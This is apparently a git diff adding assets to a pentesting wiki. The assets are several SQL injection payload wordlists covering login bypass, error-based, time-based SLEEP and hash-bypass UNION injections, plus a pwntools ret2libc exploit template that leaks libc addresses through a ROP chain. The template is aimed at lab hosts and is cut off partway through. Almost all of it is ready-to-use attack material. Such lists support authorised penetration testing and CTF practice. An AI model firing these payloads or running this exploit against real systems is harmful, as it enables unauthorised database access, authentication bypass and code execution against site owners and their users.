+"oR(2)=2#
+"oR(2)=2/*
+"oR(2)=2/*
+"oR(2)=(2)oR"
+"oR"2"="2" LimIT 1-- 2
+"oR"2"="2" LimIT 1#
+"oR"2"="2" LimIT 1/*
+"oR(2)=(2)LimIT(1)-- 2
+"oR(2)=(2)LimIT(1)#
+"oR(2)=(2)LimIT(1)/*
+
+'oR true-- 2
+'oR true#
+'oR true/*
+'oR true oR'
+'oR(true)-- 2
+'oR(true)#
+'oR(true)/*
+'oR(true)oR'
+'oR/**/true-- 2
+'oR/**/true#
+'oR/**/true/*
+'oR/**/true/**/oR'
+"oR true-- 2
+"oR true#
+"oR true/*
+"oR true oR"
+"oR(true)-- 2
+"oR(true)#
+"oR(true)/*
+"oR(true)oR"
+"oR/**/true-- 2
+"oR/**/true#
+"oR/**/true/*
+"oR/**/true/**/oR"
+
+'oR'2'LiKE'2
+'oR'2'LiKE'2'-- 2
+'oR'2'LiKE'2'#
+'oR'2'LiKE'2'/*
+'oR'2'LiKE'2'oR'
+'oR(2)LiKE(2)-- 2
+'oR(2)LiKE(2)#
+'oR(2)LiKE(2)/*
+'oR(2)LiKE(2)oR'
+"oR"2"LiKE"2
+"oR"2"LiKE"2"-- 2
+"oR"2"LiKE"2"#
+"oR"2"LiKE"2"/*
+"oR"2"LiKE"2"oR"
+"oR(2)LiKE(2)-- 2
+"oR(2)LiKE(2)#
+"oR(2)LiKE(2)/*
+"oR(2)LiKE(2)oR"
+
+admin
+admin'-- 2
+admin'#
+admin'/*
+admin"-- 2
+admin"#
+ffifdyop
+
+' UniON SElecT 1,2-- 2
+' UniON SElecT 1,2,3-- 2
+' UniON SElecT 1,2,3,4-- 2
+' UniON SElecT 1,2,3,4,5-- 2
+' UniON SElecT 1,2#
+' UniON SElecT 1,2,3#
+' UniON SElecT 1,2,3,4#
+' UniON SElecT 1,2,3,4,5#
+'UniON(SElecT(1),2)-- 2
+'UniON(SElecT(1),2,3)-- 2
+'UniON(SElecT(1),2,3,4)-- 2
+'UniON(SElecT(1),2,3,4,5)-- 2
+'UniON(SElecT(1),2)#
+'UniON(SElecT(1),2,3)#
+'UniON(SElecT(1),2,3,4)#
+'UniON(SElecT(1),2,3,4,5)#
+" UniON SElecT 1,2-- 2
+" UniON SElecT 1,2,3-- 2
+" UniON SElecT 1,2,3,4-- 2
+" UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2#
+" UniON SElecT 1,2,3#
+" UniON SElecT 1,2,3,4#
+" UniON SElecT 1,2,3,4,5#
+"UniON(SElecT(1),2)-- 2
+"UniON(SElecT(1),2,3)-- 2
+"UniON(SElecT(1),2,3,4)-- 2
+"UniON(SElecT(1),2,3,4,5)-- 2
+"UniON(SElecT(1),2)#
+"UniON(SElecT(1),2,3)#
+"UniON(SElecT(1),2,3,4)#
+"UniON(SElecT(1),2,3,4,5)#
+
+'||'2
+'||2-- 2
+'||'2'||'
+'||2#
+'||2/*
+'||2||'
+"||"2
+"||2-- 2
+"||"2"||"
+"||2#
+"||2/*
+"||2||"
+'||'2'='2
+'||'2'='2'||'
+'||2=2-- 2
+'||2=2#
+'||2=2/*
+'||2=2||'
+"||"2"="2
+"||"2"="2"||"
+"||2=2-- 2
+"||2=2#
+"||2=2/*
+"||2=2||"
+'||2=(2)LimIT(1)-- 2
+'||2=(2)LimIT(1)#
+'||2=(2)LimIT(1)/*
+"||2=(2)LimIT(1)-- 2
+"||2=(2)LimIT(1)#
+"||2=(2)LimIT(1)/*
+'||true-- 2
+'||true#
+'||true/*
+'||true||'
+"||true-- 2
+"||true#
+"||true/*
+"||true||"
+'||'2'LiKE'2
+'||'2'LiKE'2'-- 2
+'||'2'LiKE'2'#
+'||'2'LiKE'2'/*
+'||'2'LiKE'2'||'
+'||(2)LiKE(2)-- 2
+'||(2)LiKE(2)#
+'||(2)LiKE(2)/*
+'||(2)LiKE(2)||'
+"||"2"LiKE"2
+"||"2"LiKE"2"-- 2
+"||"2"LiKE"2"#
+"||"2"LiKE"2"/*
+"||"2"LiKE"2"||"
+"||(2)LiKE(2)-- 2
+"||(2)LiKE(2)#
+"||(2)LiKE(2)/*
+"||(2)LiKE(2)||"
+
+')oR('2
+')oR'2'-- 2
+')oR'2'#
+')oR'2'/*
+')oR'2'oR('
+')oR(2)-- 2
+')oR(2)#
+')oR(2)/*
+')oR(2)oR('
+')oR 2-- 2
+')oR 2#
+')oR 2/*
+')oR 2 oR('
+')oR/**/2-- 2
+')oR/**/2#
+')oR/**/2/*
+')oR/**/2/**/oR('
+")oR("2
+")oR"2"-- 2
+")oR"2"#
+")oR"2"/*
+")oR"2"oR("
+")oR(2)-- 2
+")oR(2)#
+")oR(2)/*
+")oR(2)oR("
+")oR 2-- 2
+")oR 2#
+")oR 2/*
+")oR 2 oR("
+")oR/**/2-- 2
+")oR/**/2#
+")oR/**/2/*
+")oR/**/2/**/oR("
+')oR'2'=('2
+')oR'2'='2'oR('
+')oR'2'='2'-- 2
+')oR'2'='2'#
+')oR'2'='2'/*
+')oR'2'='2'oR('
+')oR 2=2-- 2
+')oR 2=2#
+')oR 2=2/*
+')oR 2=2 oR('
+')oR/**/2=2-- 2
+')oR/**/2=2#
+')oR/**/2=2/*
+')oR/**/2=2/**/oR('
+')oR(2)=2-- 2
+')oR(2)=2#
+')oR(2)=2/*
+')oR(2)=2/*
+')oR(2)=(2)oR('
+')oR'2'='2' LimIT 1-- 2
+')oR'2'='2' LimIT 1#
+')oR'2'='2' LimIT 1/*
+')oR(2)=(2)LimIT(1)-- 2
+')oR(2)=(2)LimIT(1)#
+')oR(2)=(2)LimIT(1)/*
+")oR"2"=("2
+")oR"2"="2"oR("
+")oR"2"="2"-- 2
+")oR"2"="2"#
+")oR"2"="2"/*
+")oR"2"="2"oR("
+")oR 2=2-- 2
+")oR 2=2#
+")oR 2=2/*
+")oR 2=2 oR("
+")oR/**/2=2-- 2
+")oR/**/2=2#
+")oR/**/2=2/*
+")oR/**/2=2/**/oR("
+")oR(2)=2-- 2
+")oR(2)=2#
+")oR(2)=2/*
+")oR(2)=2/*
+")oR(2)=(2)oR("
+")oR"2"="2" LimIT 1-- 2
+")oR"2"="2" LimIT 1#
+")oR"2"="2" LimIT 1/*
+")oR(2)=(2)LimIT(1)-- 2
+")oR(2)=(2)LimIT(1)#
+")oR(2)=(2)LimIT(1)/*
+')oR true-- 2
+')oR true#
+')oR true/*
+')oR true oR('
+')oR(true)-- 2
+')oR(true)#
+')oR(true)/*
+')oR(true)oR('
+')oR/**/true-- 2
+')oR/**/true#
+')oR/**/true/*
+')oR/**/true/**/oR('
+")oR true-- 2
+")oR true#
+")oR true/*
+")oR true oR("
+")oR(true)-- 2
+")oR(true)#
+")oR(true)/*
+")oR(true)oR("
+")oR/**/true-- 2
+")oR/**/true#
+")oR/**/true/*
+")oR/**/true/**/oR("
+')oR'2'LiKE('2
+')oR'2'LiKE'2'-- 2
+')oR'2'LiKE'2'#
+')oR'2'LiKE'2'/*
+')oR'2'LiKE'2'oR('
+')oR(2)LiKE(2)-- 2
+')oR(2)LiKE(2)#
+')oR(2)LiKE(2)/*
+')oR(2)LiKE(2)oR('
+")oR"2"LiKE("2
+")oR"2"LiKE"2"-- 2
+")oR"2"LiKE"2"#
+")oR"2"LiKE"2"/*
+")oR"2"LiKE"2"oR("
+")oR(2)LiKE(2)-- 2
+")oR(2)LiKE(2)#
+")oR(2)LiKE(2)/*
+")oR(2)LiKE(2)oR("
+admin')-- 2
+admin')#
+admin')/*
+admin")-- 2
+admin")#
+') UniON SElecT 1,2-- 2
+') UniON SElecT 1,2,3-- 2
+') UniON SElecT 1,2,3,4-- 2
+') UniON SElecT 1,2,3,4,5-- 2
+') UniON SElecT 1,2#
+') UniON SElecT 1,2,3#
+') UniON SElecT 1,2,3,4#
+') UniON SElecT 1,2,3,4,5#
+')UniON(SElecT(1),2)-- 2
+')UniON(SElecT(1),2,3)-- 2
+')UniON(SElecT(1),2,3,4)-- 2
+')UniON(SElecT(1),2,3,4,5)-- 2
+')UniON(SElecT(1),2)#
+')UniON(SElecT(1),2,3)#
+')UniON(SElecT(1),2,3,4)#
+')UniON(SElecT(1),2,3,4,5)#
+") UniON SElecT 1,2-- 2
+") UniON SElecT 1,2,3-- 2
+") UniON SElecT 1,2,3,4-- 2
+") UniON SElecT 1,2,3,4,5-- 2
+") UniON SElecT 1,2#
+") UniON SElecT 1,2,3#
+") UniON SElecT 1,2,3,4#
+") UniON SElecT 1,2,3,4,5#
+")UniON(SElecT(1),2)-- 2
+")UniON(SElecT(1),2,3)-- 2
+")UniON(SElecT(1),2,3,4)-- 2
+")UniON(SElecT(1),2,3,4,5)-- 2
+")UniON(SElecT(1),2)#
+")UniON(SElecT(1),2,3)#
+")UniON(SElecT(1),2,3,4)#
+")UniON(SElecT(1),2,3,4,5)#
+')||('2
+')||2-- 2
+')||'2'||('
+')||2#
+')||2/*
+')||2||('
+")||("2
+")||2-- 2
+")||"2"||("
+")||2#
+")||2/*
+")||2||("
+')||'2'=('2
+')||'2'='2'||('
+')||2=2-- 2
+')||2=2#
+')||2=2/*
+')||2=2||('
+")||"2"=("2
+")||"2"="2"||("
+")||2=2-- 2
+")||2=2#
+")||2=2/*
+")||2=2||("
+')||2=(2)LimIT(1)-- 2
+')||2=(2)LimIT(1)#
+')||2=(2)LimIT(1)/*
+")||2=(2)LimIT(1)-- 2
+")||2=(2)LimIT(1)#
+")||2=(2)LimIT(1)/*
+')||true-- 2
+')||true#
+')||true/*
+')||true||('
+")||true-- 2
+")||true#
+")||true/*
+")||true||("
+')||'2'LiKE('2
+')||'2'LiKE'2'-- 2
+')||'2'LiKE'2'#
+')||'2'LiKE'2'/*
+')||'2'LiKE'2'||('
+')||(2)LiKE(2)-- 2
+')||(2)LiKE(2)#
+')||(2)LiKE(2)/*
+')||(2)LiKE(2)||('
+")||"2"LiKE("2
+")||"2"LiKE"2"-- 2
+")||"2"LiKE"2"#
+")||"2"LiKE"2"/*
+")||"2"LiKE"2"||("
+")||(2)LiKE(2)-- 2
+")||(2)LiKE(2)#
+")||(2)LiKE(2)/*
+")||(2)LiKE(2)||("
+' UnION SELeCT 1,2`
+' UnION SELeCT 1,2,3`
+' UnION SELeCT 1,2,3,4`
+' UnION SELeCT 1,2,3,4,5`
+" UnION SELeCT 1,2`
+" UnION SELeCT 1,2,3`
+" UnION SELeCT 1,2,3,4`
+" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-error.txt b/.gitbook/assets/sqli-error.txt
new file mode 100644
index 00000000..693ccdd1
--- /dev/null
+++ b/.gitbook/assets/sqli-error.txt
@@ -0,0 +1,40 @@
+'asd
+')asd
+''asd
+'))asd
+`ads
+`)asd
+``asd
+`))asd
+,
+"asd
+")asd
+""asd
+"))asd
+/
+//
+\
+\\
+;ad
+%2527asd
+%2522asd
+-- -
+#
+/*
+1
+-1
+999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
+-999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
+asd
+|
+&
+||
+&&
+@
+%
+;
+>
+!"·$%&(=?¿'¡`<>);:_#-@
+SLEEP(5)
+SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
+SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR"*/ FROM some_table WHERE ex = ample
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-hashbypass.txt b/.gitbook/assets/sqli-hashbypass.txt
new file mode 100644
index 00000000..5d65242a
--- /dev/null
+++ b/.gitbook/assets/sqli-hashbypass.txt
@@ -0,0 +1,16 @@
+Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
+Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
+Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
+Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
+Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
+Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
+Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
+Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
+Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
+Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
+Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
+Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
+Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
+Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
+Pass1234." and 1=0 union select "admin",sha("Pass1234.
+Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-logic.txt b/.gitbook/assets/sqli-logic.txt
new file mode 100644
index 00000000..6efb4fbf
--- /dev/null
+++ b/.gitbook/assets/sqli-logic.txt
@@ -0,0 +1,82 @@
+true
+1
+1>0
+2-1
+0+1
+1*1
+1%2
+1 & 1
+1&1
+1 && 2
+1&&2
+-1 || 1
+-1||1
+-1 oR 1=1
+1 aND 1=1
+(1)oR(1=1)
+(1)aND(1=1)
+-1/**/oR/**/1=1
+1/**/aND/**/1=1
+1'
+1'>'0
+2'-'1
+0'+'1
+1'*'1
+1'%'2
+1'&'1'='1
+1'&&'2'='1
+-1'||'1'='1
+-1'oR'1'='1
+1'aND'1'='1
+1"
+1">"0
+2"-"1
+0"+"1
+1"*"1
+1"%"2
+1"&"1"="1
+1"&&"2"="1
+-1"||"1"="1
+-1"oR"1"="1
+1"aND"1"="1
+1`
+1`>`0
+2`-`1
+0`+`1
+1`*`1
+1`%`2
+1`&`1`=`1
+1`&&`2`=`1
+-1`||`1`=`1
+-1`oR`1`=`1
+1`aND`1`=`1
+1')>('0
+2')-('1
+0')+('1
+1')*('1
+1')%('2
+1')&'1'=('1
+1')&&'1'=('1
+-1')||'1'=('1
+-1')oR'1'=('1
+1')aND'1'=('1
+1")>("0
+2")-("1
+0")+("1
+1")*("1
+1")%("2
+1")&"1"=("1
+1")&&"1"=("1
+-1")||"1"=("1
+-1")oR"1"=("1
+1")aND"1"=("1
+1`)>(`0
+2`)-(`1
+0`)+(`1
+1`)*(`1
+1`)%(`2
+1`)&`1`=(`1
+1`)&&`1`=(`1
+-1`)||`1`=(`1
+-1`)oR`1`=(`1
+1`)aND`1`=(`1
diff --git a/.gitbook/assets/sqli-true.txt b/.gitbook/assets/sqli-true.txt
new file mode 100644
index 00000000..d28f1dfa
--- /dev/null
+++ b/.gitbook/assets/sqli-true.txt
@@ -0,0 +1,421 @@
+true
+'&'
+"&"
+'^'
+"^"
+'*'
+"*"
+0=0
+'='
+"="
+')&('
+")&("
+')^('
+")^("
+')*('
+")*("
+0)=(0
+')=('
+")=("
+'))&(('
+"))&(("
+'))^(('
+"))^(("
+'))*(('
+"))*(("
+0))=((0
+'))=(('
+"))=(("
+2'LIkE'3
+2"LIkE"3
+-3')LIkE('3
+-3")LIkE("3
+-3'))LIkE(('3
+-3"))LIkE(("3
+-3 oR 2=2
+-3' oR 2=2-- 2
+-3' oR 2=2#
+-3' oR 2=2/*
+-3" oR 2=2-- 2
+-3" oR 2=2#
+-3" oR 2=2/*
+-3 oR 2
+-3' oR 2-- 2
+-3' oR 2#
+-3' oR 2/*
+-3" oR 2-- 2
+-3" oR 2#
+-3" oR 2/*
+-3 oR 2>0
+-3' oR 2>0-- 2
+-3' oR 2>0#
+-3' oR 2>0/*
+-3" oR 2>0-- 2
+-3" oR 2>0#
+-3" oR 2>0/*
+-3 oR 0<2
+-3' oR 0<2-- 2
+-3' oR 0<2#
+-3' oR 0<2/*
+-3" oR 0<2-- 2
+-3" oR 0<2#
+-3" oR 0<2/*
+-3 oR 2 LIkE 2
+-3' oR 2 LIkE 2-- 2
+-3' oR 2 LIkE 2#
+-3' oR 2 LIkE 2/*
+-3" oR 2 LIkE 2-- 2
+-3" oR 2 LIkE 2#
+-3" oR 2 LIkE 2/*
+-3 oR '2'='2'
+-3' oR 2 oR '
+-3'oR'2'oR'
+-3" oR 2 oR "
+-3"oR"2"oR"
+-3 oR true
+-3' oR true-- 2
+-3' oR true#
+-3' oR true/*
+-3" oR true-- 2
+-3" oR true#
+-3" oR true/*
+-3'oR''+'2
+-3"oR""+"2
+-3'oR''-'-2
+-3"oR""-"-2
+-3'oR'2'&'2
+-3"oR"2"&"2
+-3'oR''^'2
+-3"oR""^"2
+-3'oR'2'*'2
+-3"oR"2"*"2
+-3'oR'2'>'0
+-3"oR"0"<"2
+-3'oR'2'='2
+-3"oR"2"="2
+-3/**/oR/**/2=2
+-3'/**/oR/**/2=2#
+-3'/**/oR/**/2=2/*
+-3"/**/oR/**/2=2#
+-3"/**/oR/**/2=2/*
+-3/**/oR/**/2
+-3'/**/oR/**/2#
+-3'/**/oR/**/2/*
+-3"/**/oR/**/2#
+-3"/**/oR/**/2/*
+-3/**/oR/**/2>0
+-3'/**/oR/**/2>0#
+-3'/**/oR/**/2>0/*
+-3"/**/oR/**/2>0#
+-3"/**/oR/**/2>0/*
+-3/**/oR/**/0<2
+-3'/**/oR/**/0<2#
+-3'/**/oR/**/0<2/*
+-3"/**/oR/**/0<2#
+-3"/**/oR/**/0<2/*
+-3/**/oR/**/2/**/LIkE/**/2
+-3'/**/oR/**/2/**/LIkE/**/2#
+-3'/**/oR/**/2/**/LIkE/**/2/*
+-3"/**/oR/**/2/**/LIkE/**/2#
+-3"/**/oR/**/2/**/LIkE/**/2/*
+-3/**/oR/**/'2'='2'
+-3'/**/oR/**/2/**/oR/**/'
+-3"/**/oR/**/2/**/oR/**/"
+-3/**/oR/**/true
+-3'/**/oR/**/true#
+-3'/**/oR/**/true/*
+-3"/**/oR/**/true#
+-3"/**/oR/**/true/*
+-3||2=2
+-3'||2=2-- 2
+-3'||2=2#
+-3'||2=2/*
+-3"||2=2-- 2
+-3"||2=2#
+-3"||2=2/*
+-3||2
+-3'||2-- 2
+-3'||2#
+-3'||2/*
+-3"||2-- 2
+-3"||2#
+-3"||2/*
+-3||2>0
+-3'||2>0-- 2
+-3'||2>0#
+-3'||2>0/*
+-3"||2>0-- 2
+-3"||2>0#
+-3"||2>0/*
+-3||0<2
+-3'||0<2-- 2
+-3'||0<2#
+-3'||0<2/*
+-3"||0<2-- 2
+-3"||0<2#
+-3"||0<2/*
+-3||(2)LIkE(2)
+-3'||(2)LIkE(2)-- 2
+-3'||(2)LIkE(2)#
+-3'||(2)LIkE(2)/*
+-3"||(2)LIkE(2)-- 2
+-3"||(2)LIkE(2)#
+-3"||(2)LIkE(2)/*
+-3||'2'='2'
+-3'||'2'='2
+-3"||"2"="2
+-3'||2||'
+-3'||'2'||'
+-3"||2||"
+-3"||"2"||"
+-3||true
+-3'||true-- 2
+-3'||true#
+-3'||true/*
+-3"||true-- 2
+-3"||true#
+-3"||true/*
+-3'||''+'2
+-3"||""+"2
+-3'||''-'-2
+-3"||""-"-2
+-3'||'2'&'2
+-3"||"2"&"2
+-3'||''^'2
+-3"||""^"2
+-3'||'2'*'2
+-3"||"2"*"2
+(-3)oR(2)=(2)
+-3'oR(2)=(2)#
+-3'oR(2)=(2)/*
+-3"oR(2)=(2)#
+-3"oR(2)=(2)/*
+(-3)oR(2)
+-3'oR(2)#
+-3'oR(2)/*
+-3"oR(2)#
+-3"oR(2)/*
+(-3)oR(2)LIkE(2)
+-3'oR(2)LIkE(2)#
+-3'oR(2)LIkE(2)/*
+-3"oR(2)LIkE(2)#
+-3"oR(2)LIkE(2)/*
+(-3)oR'2'='2'
+-3"oR"(2)"="(2)
+-3'oR(2)oR'
+-3"oR(2)oR"
+(-3)oR(true)
+-3'oR(true)#
+-3'oR(true)/*
+-3"oR(true)#
+-3"oR(true)/*
+-3)oR(2)=(2
+-3')oR(2)=2-- 2
+-3')oR(2)=2#
+-3')oR(2)=2/*
+-3")oR(2)=2-- 2
+-3")oR(2)=2#
+-3")oR(2)=2/*
+-3)oR(2
+-3')oR(2)-- 2
+-3')oR(2)#
+-3')oR(2)/*
+-3")oR(2)-- 2
+-3")oR(2)#
+-3")oR(2)/*
+-3)oR(2)>(0
+-3')oR(2)>0-- 2
+-3')oR(2)>0#
+-3')oR(2)>0/*
+-3")oR(2)>0-- 2
+-3")oR(2)>0#
+-3")oR(2)>0/*
+-3)oR(0)<(2
+-3')oR(0)<2-- 2
+-3')oR(0)<2#
+-3')oR(0)<2/*
+-3")oR(0)<2-- 2
+-3")oR(0)<2#
+-3")oR(0)<2/*
+-3)oR(2)LIkE(2
+-3')oR(2)LIkE(2)-- 2
+-3')oR(2)LIkE(2)#
+-3')oR(2)LIkE(2)/*
+-3")oR(2)LIkE(2)-- 2
+-3")oR(2)LIkE(2)#
+-3")oR(2)LIkE(2)/*
+-3)oR'2'=('2'
+-3')oR'2'=('2
+-3")oR"2"=("2
+-3')oR(2)oR('
+-3')oR'2'oR('
+-3")oR(2)oR("
+-3")oR"2"oR("
+-3)oR(true
+-3')oR(true)-- 2
+-3')oR(true)#
+-3')oR(true)/*
+-3")oR(true)-- 2
+-3")oR(true)#
+-3")oR(true)/*
+-3')oR''+('2
+-3")oR""+("2
+-3')oR''-('-2
+-3")oR""-("-2
+-3')oR'2'&('2
+-3")oR"2"&("2
+-3')oR''^('2
+-3")oR""^("2
+-3')oR'2'*('2
+-3")oR"2"*("2
+-3')/**/oR/**/2/**/oR/**/('
+-3")/**/oR/**/2/**/oR/**/("
+-3)||2=(2
+-3')||2=2-- 2
+-3')||2=2#
+-3')||2=2/*
+-3")||2=2-- 2
+-3")||2=2#
+-3")||2=2/*
+-3)||(2
+-3')||2-- 2
+-3')||2#
+-3')||2/*
+-3")||2-- 2
+-3")||2#
+-3")||2/*
+-3||(2)LIkE(2
+-3')||(2)LIkE2-- 2
+-3')||(2)LIkE2#
+-3')||(2)LIkE2/*
+-3")||(2)LIkE2-- 2
+-3")||(2)LIkE2#
+-3")||(2)LIkE2/*
+-3)||'2'=('2'
+-3')||'2'=('2
+-3")||"2"=("2
+-3')||2||('
+-3')||'2'||('
+-3")||2||("
+-3")||"2"||("
+-3)||(true
+-3')||(true)-- 2
+-3')||(true)#
+-3')||(true)/*
+-3")||(true)-- 2
+-3")||(true)#
+-3")||(true)/*
+-3')||''+('2
+-3")||""+("2
+-3')||''-('-2
+-3")||""-("-2
+-3')||'2'&('2
+-3")||"2"&("2
+-3')||''^('2
+-3")||""^("2
+-3')||'2'*('2
+-3")||"2"*("2
+-3))oR(2)=((2
+-3'))oR(2)=2-- 2
+-3'))oR(2)=2#
+-3'))oR(2)=2/*
+-3"))oR(2)=2-- 2
+-3"))oR(2)=2#
+-3"))oR(2)=2/*
+-3))oR((2
+-3'))oR(2)-- 2
+-3'))oR(2)#
+-3'))oR(2)/*
+-3"))oR(2)-- 2
+-3"))oR(2)#
+-3"))oR(2)/*
+-3))oR(2)>((0
+-3'))oR(2)>0-- 2
+-3'))oR(2)>0#
+-3'))oR(2)>0/*
+-3"))oR(2)>0-- 2
+-3"))oR(2)>0#
+-3"))oR(2)>0/*
+-3))oR(0)<((2
+-3'))oR(0)<2-- 2
+-3'))oR(0)<2#
+-3'))oR(0)<2/*
+-3"))oR(0)<2-- 2
+-3"))oR(0)<2#
+-3"))oR(0)<2/*
+-3))oR(2)LIkE((2
+-3'))oR(2)LIkE(2)-- 2
+-3'))oR(2)LIkE(2)#
+-3'))oR(2)LIkE(2)/*
+-3"))oR(2)LIkE(2)-- 2
+-3"))oR(2)LIkE(2)#
+-3"))oR(2)LIkE(2)/*
+-3))oR'2'=(('2'
+-3'))oR'2'=(('2
+-3"))oR"2"=(("2
+-3'))oR(2)oR(('
+-3'))oR'2'oR(('
+-3"))oR(2)oR(("
+-3"))oR"2"oR(("
+-3))oR((true
+-3'))oR(true)-- 2
+-3'))oR(true)#
+-3'))oR(true)/*
+-3"))oR(true)-- 2
+-3"))oR(true)#
+-3"))oR(true)/*
+-3'))oR''+(('2
+-3"))oR""+(("2
+-3'))oR''-(('-2
+-3"))oR""-(("-2
+-3'))oR'2'&(('2
+-3"))oR"2"&(("2
+-3'))oR''^(('2
+-3"))oR""^(("2
+-3'))oR'2'*(('2
+-3"))oR"2"*(("2
+-3))||2=((2
+-3'))||2=2-- 2
+-3'))||2=2#
+-3'))||2=2/*
+-3"))||2=2-- 2
+-3"))||2=2#
+-3"))||2=2/*
+-3))||((2
+-3'))||2-- 2
+-3'))||2#
+-3'))||2/*
+-3"))||2-- 2
+-3"))||2#
+-3"))||2/*
+-3||(2)LIkE((2
+-3'))||(2)LIkE2-- 2
+-3'))||(2)LIkE2#
+-3'))||(2)LIkE2/*
+-3"))||(2)LIkE2-- 2
+-3"))||(2)LIkE2#
+-3"))||(2)LIkE2/*
+-3))||'2'=(('2'
+-3'))||'2'=(('2
+-3"))||"2"=(("2
+-3'))||2||(('
+-3'))||'2'||(('
+-3"))||2||(("
+-3"))||"2"||(("
+-3))||((true
+-3'))||(true)-- 2
+-3'))||(true)#
+-3'))||(true)/*
+-3"))||(true)-- 2
+-3"))||(true)#
+-3"))||(true)/*
+-3'))||''+(('2
+-3"))||""+(("2
+-3'))||''-(('-2
+-3"))||""-(("-2
+-3'))||'2'&(('2
+-3"))||"2"&(("2
+-3'))||''^(('2
+-3"))||""^(("2
+-3'))||'2'*(('2
+-3"))||"2"*(("2
\ No newline at end of file
diff --git a/.gitbook/assets/ssti-methodology-diagram.png b/.gitbook/assets/ssti-methodology-diagram.png
new file mode 100644
index 00000000..90b57b2d
Binary files /dev/null and b/.gitbook/assets/ssti-methodology-diagram.png differ
diff --git a/.gitbook/assets/template.py b/.gitbook/assets/template.py
new file mode 100644
index 00000000..8f889b5e
--- /dev/null
+++ b/.gitbook/assets/template.py
@@ -0,0 +1,112 @@
+from pwn import * # Import pwntools
+
+
+####################
+#### CONNECTION ####
+####################
+LOCAL = True
+REMOTETTCP = False
+REMOTESSH = False
+GDB = False
+
+local_bin = "./vuln"
+remote_bin = "~/vuln" #For ssh
+libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
+
+if LOCAL:
+    p = process(local_bin) # start the vuln binary
+    elf = ELF(local_bin)# Extract data from binary
+    rop = ROP(elf)# Find ROP gadgets
+
+elif REMOTETTCP:
+    p = remote('docker.hackthebox.eu',31648) # start the vuln binary
+    elf = ELF(local_bin)# Extract data from binary
+    rop = ROP(elf)# Find ROP gadgets
+
+elif REMOTESSH:
+    ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+    p = ssh_shell.process(remote_bin) # start the vuln binary
+    elf = ELF(local_bin)# Extract data from binary
+    rop = ROP(elf)# Find ROP gadgets
+
+
+if GDB:
+    # attach gdb and continue
+    # You can set breakpoints, for example "break *main"
+    gdb.attach(p.pid, "continue")
+
+
+####################
+#### Find offset ###
+####################
+OFFSET = "A"*40
+if OFFSET == "":
+    gdb.attach(p.pid, "c") #Attach and continue
+    payload = cyclic(1000)
+    print(p.clean())
+    p.sendline(payload)
+    #x/wx $rsp -- Search for bytes that crashed the application
+    #cyclic_find(0x6161616b) # Find the offset of those bytes
+    p.interactive()
+    exit()
+
+
+#####################
+#### Find Gadgets ###
+#####################
+PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
+MAIN_PLT = elf.symbols['main']
+POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
+
+log.info("Main start: " + hex(MAIN_PLT))
+log.info("Puts plt: " + hex(PUTS_PLT))
+log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
+
+def get_addr(func_name):
+    FUNC_GOT = elf.got[func_name]
+    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
+    # Create rop chain
+    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+
+    #Send our rop-chain payload
+    #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
+    print(p.clean()) # clean socket buffer (read all and print)
+    p.sendline(rop1)
+
+    #Parse leaked address
+    recieved = p.recvline().strip()
+    leak = u64(recieved.ljust(8, "\x00"))
+    log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
+    #If not libc yet, stop here
+    if libc != "":
+        libc.address = leak - libc.symbols[func_name] #Save libc base
+        log.info("libc base @ %s" % hex(libc.address))
+    
+    return hex(leak)
+
+get_addr("puts") #Search for puts address in memmory to obtains libc base
+if libc == "":
+    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
+    p.interactive()
+
+# Notice that if a libc was specified the base of the library will be saved in libc.address
+# this implies that in the future if you search for functions in libc, the resulting address
+# will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS)
+
+#################################
